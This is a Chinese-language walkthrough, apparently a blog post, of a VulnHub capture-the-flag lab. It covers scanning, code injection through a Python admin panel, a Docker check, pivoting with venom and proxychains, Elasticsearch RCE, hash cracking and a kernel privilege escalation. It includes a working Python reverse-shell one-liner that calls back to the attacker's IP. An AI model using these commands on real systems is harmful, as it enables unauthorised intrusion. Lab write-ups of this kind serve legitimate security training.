靶场下载

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

涉及的任务:

端口扫描
网络应用程序攻击
代码注入
pivoting(英语不好不知道对应什么术语)
开发
密码破解
暴力破解

机器

kali 192.168.0.10
靶机 192.168.0.1/24

过程

利用arp-scan发现目标IP

 arp-scan -l

46468-31j1rgrcoo2.png

NMAP扫描端口与对应服务并查看

nmap -sS -p 1-65535 -sV -Pn 192.168.0.106

发现5000端口对应了python服务
98530-pk4d83dziq.png

打开后对框略微测试,发现没xss和ssti。准备扫描目录
45363-m1ns7utiek7.png

扫描目录

发现后台地址
56949-p0bck5xmo8l.png

由于这里是python写的web所以尝试利用python命令去调用系统命令。
原先想使用os.system去查看命令,发现无回显。准备尝试反弹shell

反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.10",777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

26112-e7ox527k9y.png

可以看到kali已经接受到了反弹shell。
发现权限是root。但是在app底下有个dockerfile的文件。有经验的人,应该立马就猜到有可能这是在docker里了
88147-7v8m7knu67d.png

我们来继续验证下是不是在docker里
1.ls -alh /.dockerenv
一般来说如果在非docker环境下是没有这个.dockerenv文件的
44732-f40onhjt5lw.png

2.cat /proc/1/cgroup
45188-jgg1jszs3uf.png

所以说,目前我们是在docker里面,这里其实就可以尝试去做docker逃逸了。不过这次涉及的任务里没有docker逃逸。就继续往下吧(其实我有尝试行不行,但是不行)

信息收集

先ifconfig看看
47509-nkdlhww6q7.png

可以发现这里是个b段172.17.0.3/16
接下来我们起个web服务,然后用wget去下载netspy。并用netspy去快速检测可达网段,节省时间。

python2 -m SimpleHTTPServer 8888

27890-pc7envgurs.png

接下来就利用icmp去循环查找一下其他机器

for i in $(seq 1 255); do ping -c 1 172.17.0.$i ; done

56647-s7syaaf16wi.png

存活IP有
172.17.0.1-3
接下来可以传个代理工具去访问其他机器了。
起初我想用ew去做代理,但是发现目标环境似乎不支持ew运行,遂使用venom。

启动代理

先在kali处运行server端
78379-fif04iobhif.png

根据目标版本上传agent到目标机器后并执行
99606-41wchyb848y.png

这边server端可以发现新的监听上线
19931-bmjdnw0rnb.png

接下来进入node在本地1080端口建立一个socks5监听
65543-9l6e3tp3hc.png

编辑一下proxychains配置文件

vim /etc/proxychains.conf

98075-fjw4nhxu44.png

横向渗透

在编辑好代理工具proxychains后利用这个工具可以进行横向渗透了。
我们先代理一下浏览器,看看能不能访问到内网的站点
28205-hnzlh8wts4k.png

成功访问到。说明代理已经建立好了。那接下来就对其他俩台做个端口扫描

proxychains nmap -sT -Pn 172.17.0.1

结果发现172.17.0.1也是那个站点
18594-rwky8n445s9.png

49110-d82a55nakg6.png

扫描172.17.0.2
64652-lcrndzsf5ne.png

75921-0ex108uztron.png

这里发现服务是Elasticsearch REST API 1.4.2
这个版本是存在RCE漏洞的。
我们利用searchsploit去查找一下漏洞
09082-8f1gik7vvbr.png

68651-mo1x8qf9d3.png

并在当前目录发现个passwords
05036-be4old6szap.png

somd5网站解密(就不一个个截图了)
49021-8l5l9s1z5ie.png

得到密码后尝试用ssh去登录目标系统
84154-0hm08i9zk4k.png

提权

先查看一下系统版本。然后去搜索对应exp
47503-uytydrj2nz7.png

98866-ipxyjh3uikd.png

由于目标靶机无编译环境,所以,我们需要在本地编译好后上传至目标靶机
05404-75gf234muc7.png

且在代码中也会发现调用了个编译的操作,所以我们也需要修改这串代码。
删除下图代码
19066-680wa2q9c36.png

并修改为
42993-pezaqirshe.png

然后利用find命令找到该so文件并cp到当前目录
54202-qoirknnamvb.png

虽然有告警但是影响不大不用管

gcc -o exp 37292.c

25657-ru2e3jy7bh.png

然后传递到目标机器上并执行,成功获得ROOT权限。至此靶机渗透结束
13062-bn69pw2y4rn.png

至此靶机渗透结束

19084-lngn3ersyld.png

发表评论